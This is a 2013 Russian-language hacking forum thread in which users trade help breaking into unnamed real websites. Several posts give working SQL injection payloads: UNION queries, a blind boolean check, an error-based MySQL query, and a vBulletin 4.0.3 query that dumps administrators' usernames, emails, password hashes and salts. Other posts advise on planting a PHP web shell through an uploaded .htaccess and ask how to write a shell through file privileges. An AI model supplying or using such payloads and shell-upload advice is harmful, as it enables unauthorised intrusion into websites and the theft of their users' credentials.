ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.06.2013, 13:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
2029
Репутация:
0
|
|
Сообщение от passwd
passwd said:
Найти админку можешь с помощью такого php скрипта
эти пути уже давно пробил результат 0
Сообщение от passwd
passwd said:
А пароль и имя пользователя чаще всего хранятся в таблицах:
user, users, admin, admin_users, login и т.д.
Тебе же нужно просто просмотреть все таблицы и найти хоть что-то где может быть написано password, pwd, passwd.
все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел
|
|
|
|
18.06.2013, 13:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от J.Z.
J.Z. said:
Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа:
.htaccess'a
в папке не лежит, кто что может предложить?
P.s. любые файлы на пыхе работать категорически отказываются.
залей свой хтаккес с разришением выполнеения пыха в картинках
Сообщение от biaktrisa
biaktrisa said:
эти пути уже давно пробил результат 0
все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел
значит сайт без админки, поетому и паролей нет
|
|
|
|
18.06.2013, 13:15
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Есть сайт с уязвимым полем &id=5151
Ставлю в конце ковычку одинарную &id= 5151' - вот что получаю в ответ:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0, 5151')
Есть исходный код данного участка кода:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT `id`, `name`, `uniqum`, `image`, `catsID`,`in_stock`,`cant_buy` FROM `'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$DB_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'products` WHERE `enable`=1 AND `id` IN (0,'[/COLOR][COLOR="#007700"];
foreach([/COLOR][COLOR="#0000BB"]$Basket[/COLOR][COLOR="#007700"]AS[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$bskt[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Подскажите, как правильно составить запрос, чтобы выполнилась скуль?
|
|
|
19.06.2013, 22:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от None
Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')
Думаю, нужно попробовать так
&id= 5151)+and+1=2+union+select+111,222,333,444,555+--+
Ну и понеслась...
|
|
|
|
22.06.2013, 17:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Имеется сайт с sql injection вида:
http://site/id/5
Комменты не срабатывают. Пришлось проэксплуатировать баг так:
http://site/id/5'and(mid(version(),1,1)=5)and'1
Как все это дело автоматизировать в sqlmap? ЧПУ...
|
|
|
|
24.06.2013, 13:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
976
Репутация:
0
|
|
как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?
Сообщение от None
&cat[0]=1) union select concat(username,0x3a,email,0x3a,password,0x3a,salt ) from user where usergroupid=6#
вот так ошибка в исходнике страници пишет что такой таблици не существует |
|
|
|
24.06.2013, 13:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Rurr
Rurr said:
как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?
вот так ошибка в исходнике страници пишет что такой таблици не существует
&cat[0]=1) union select table_name from information_schema.tables limit 0,1#
и перебирай через limit пока свою таблицу не найдешь.
|
|
|
|
24.06.2013, 13:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
976
Репутация:
0
|
|
Сообщение от None
А чуть выше префикс написан парой строчек выше верно?
а это не имя базы разве?
|
|
|
|
24.06.2013, 14:26
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Есть скуль MySQL error based
.php?avto=5+and(select+1+from(select+count(*),concat((select+( select+concat(0x7e,0x27,unhex(Hex(cast(user()+as+c har))),0x27,0x7e))+from+`information_schema`.table s+limit+0,1),floor(rand(0)*2))x+from+`information_ schema`.tables+group+by+x)a)+and+1=1
При таком запросе, вытает:
Ошибка SQL запросаDuplicate entry '~'user_mysql@localhost'~1' for key 'group_key'
Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y
|
|
|
|
24.06.2013, 14:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Есть скуль MySQL error based
.php?avto=5+
and(select+1+from(select+count(*),concat((select+( select+concat(0x7e,0x27,unhex(Hex(cast(user()+as+c har))),0x27,0x7e))+from+`information_schema`.table s+limit+0,1),floor(rand(0)*2))x+from+`information_ schema`.tables+group+by+x)a)+and+1=1
При таком запросе, вытает:
Ошибка SQL запросаDuplicate entry '~'
user_mysql@localhost
'~1' for key 'group_key'
Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
